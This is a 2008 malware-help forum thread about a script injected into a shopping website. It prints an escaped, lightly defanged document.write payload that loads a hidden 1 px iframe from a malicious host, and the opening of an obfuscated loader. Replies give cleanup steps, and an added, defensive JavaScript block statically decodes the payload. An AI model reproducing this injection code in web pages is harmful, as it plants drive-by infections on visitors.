
Possibly Browser Hi-jack


2 replies to this topic

#1 switchez

  • Members
  • 1 posts
  • OFFLINE
  • Local time:08:02 AM

Posted 15 March 2008 - 03:13 AM

Mostly due to this being an old and slow machine, but browsing to Shopbot I found this funny script along the lines of

docu..write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0064\u006f\u0074\u0061\u002d\u0061\u006c\u006c\u002d\u0073\u0074\u0061\u0072\u002e\u0069\u006e\u0066\u006f\u002f\u0073\u0070\u006c\u0034\u002f\u0075\u0070\u0064\u0061\u0074\u0065\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');

WARNING: TO BROWSE TO IT MAY BE TROUBLE
Changing the write to an alert shows that it's a 1 px iframe pointing to h t t p : / / dota-all-star. info/spl4/update.php

Watching my task manager I see my Iexplore virtual memory go nuts, way high.

After browsing to it and viewing the source, there is a well obfuscated JavaScript being run. It starts like this:
function epcG7(BDYWZD1zTIK1){var x61lmfe73=0,f8FDFIkHWJNzJD=BDYWZD1zTIK1.length,EJBHWkn7xn=1024,p7QR9LYNZ,zJ6CcSCwfoW,gnWkb="",xPi9V9aeU024=x61lmfe73,JN3t1V7wBuS=x61lmfe73,hGgfsJMI2VoA7S=x61lmfe73,EThCA5E=Array(63,6,8,57,29,15,23,54,62,9,0,0,0,0,0,0,61,53,27,33,16,46,7,45,5,49,39,44,18,2,24,0,13,56,30,25,48,10,47,55,36,28,26,0,0,0,0,3,0,37,50,31,52,14,4,42,11,32,35,17,22,41,19,12,21,1,59,60,34,20,58,40,51,43,38);for(zJ6CcSCwfoW=Math.ceil(f8FDFIkHWJNzJD/EJBHWkn7xn);zJ6CcSCwfoW>x61lmfe73;zJ6CcSCwfoW--){for(p7QR9LYNZ=Math.min(f8FDFIkHWJNzJD,EJBHWkn7
If you'd like to see it all I can post it.

Now I'm wondering if anyone knows about this, whether it has done something, or is just a site hijacking of Shopbot, or perhaps where to report it. I've got no idea.

Cheers

Edited by usasma, 15 March 2008 - 06:15 AM.
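The decoding step described in the post above (turning the \uXXXX escapes back into the hidden 1 px iframe), done statically instead of by swapping document.write for alert(). Replacing write() with alert() still executes the rest of the script in the browser; a static decoder never runs it and never loads the iframe URL. This is an added example, not code from the original post: the sample input is the escaped line quoted above, reproduced with the same "docu..write" defanging, and the function names are the example's own.

```javascript
// Added example (not from the original post): statically decode a
// \uXXXX-escaped document.write() payload and report what it injects,
// without evaluating the script or fetching anything.

// Constructed sample: the escaped line from the post, with the same
// "docu..write" defanging. String.raw keeps the backslashes literal so
// the string holds the six characters "\u003c", not "<".
const SAMPLE = String.raw`docu..write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0064\u006f\u0074\u0061\u002d\u0061\u006c\u006c\u002d\u0073\u0074\u0061\u0072\u002e\u0069\u006e\u0066\u006f\u002f\u0073\u0070\u006c\u0034\u002f\u0075\u0070\u0064\u0061\u0074\u0065\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');`;

// Turn \uXXXX and \xXX escapes into the characters they stand for.
// This is the whole "obfuscation" in the posted snippet: it hides the
// word "iframe" from a naive grep of the page source.
function decodeEscapes(s) {
  return s
    .replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Pull the string literal passed to write(...). Matching on "write("
// rather than "document.write(" also covers the defanged form above.
// Returns null when no such call is present.
function extractWriteArgument(src) {
  const m = /write\s*\(\s*(['"])([\s\S]*?)\1\s*\)/.exec(src);
  return m ? m[2] : null;
}

// Parse one tag's attribute text into an object. Handles double-quoted,
// single-quoted and unquoted values (the sample uses unquoted src=...).
function parseAttrs(attrText) {
  const attrs = {};
  const re = /([a-zA-Z_:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = re.exec(attrText)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// Find every <iframe ...> in the decoded HTML and flag the ones that a
// user would never see: 1 px or smaller, or styled display:none /
// visibility:hidden. Those are the drive-by loader pattern.
function findIframes(html) {
  const found = [];
  const re = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const a = parseAttrs(m[1]);
    const w = parseInt(a.width, 10);
    const h = parseInt(a.height, 10);
    const tiny = (!isNaN(w) && w <= 1) || (!isNaN(h) && h <= 1);
    const styledAway = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(a.style || "");
    found.push({ src: a.src || "", width: a.width, height: a.height, hidden: tiny || styledAway });
  }
  return found;
}

// Full pipeline: script text in, decoded HTML plus iframe summary out.
function analyze(src) {
  const arg = extractWriteArgument(src);
  const decoded = arg === null ? "" : decodeEscapes(arg);
  return { decoded, iframes: findIframes(decoded) };
}

// Stand-alone run: prints the decoded tag and where it points.
console.log(JSON.stringify(analyze(SAMPLE), null, 2));
```

The decoder only reverses the escape layer the post shows. The second script mentioned in the post (the epcG7 function with its lookup table) is a different, table-driven scheme and would need its own decoder; the safe approach is the same, though: reproduce the transform offline rather than letting the browser run it.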



#2 usasma

    Still visually handicapped (avatar is memory developed by my Dad)

  • BSOD Kernel Dump Expert
  • 25,091 posts
  • OFFLINE
  • Gender:Male
  • Location:Southeastern CT, USA
  • Local time:05:02 PM

Posted 15 March 2008 - 06:13 AM

Edited hotlink above

Edited by usasma, 15 March 2008 - 06:16 AM.

#3 DASOS

    Malware hunter

  • Security Colleague
  • 1,662 posts
  • OFFLINE
  • Gender:Male
  • Location:Greece, Loutraki, 6 km from the Korinth canal
  • Local time:11:02 PM

Posted 15 March 2008 - 06:45 AM

Hi switchez

When you click on that link, this is what you get:

http://www.sophos.com/security/analyses/vi...jbankereej.html


If you have a problem after that:

You should print out these instructions, or copy them to a Notepad file, for reading while in Safe Mode, because you will not be able to connect to the Internet to read them from this site.


Please download, install and update AVG Anti-Spyware 7.5. DO NOT perform a scan yet.

Print out the AVG Install and Scan Instructions.

Please download ATF Cleaner by Atribune. DO NOT use it yet.

Reboot your computer in SAFE MODE using the F8 method. To do this, restart your computer and after hearing your computer beep once during startup [but before the Windows icon appears] press the F8 key repeatedly. A menu will appear with several options. Use the arrow keys to navigate and select the option to run Windows in "Safe Mode".
Double-click ATF-Cleaner.exe to run the program.
Under Main choose: Select All
Click the Empty Selected button.
If you use the Firefox browser, click Firefox at the top and choose: Select All
Click the Empty Selected button.
NOTE: If you would like to keep your saved passwords, please click No at the prompt.
If you use the Opera browser, click Opera at the top and choose: Select All
Click the Empty Selected button.
NOTE: If you would like to keep your saved passwords, please click No at the prompt.
Click Exit on the Main menu to close the program. For Technical Support, double-click the e-mail address located at the bottom of each menu.

Now scan with AVG per the "Safe Mode" instructions you printed out.
IMPORTANT: Do not open any other windows or programs while AVG is scanning; it may interfere with the scanning process.

Reboot back to normal mode.

If you are still having problems, come back and we'll advise you further.



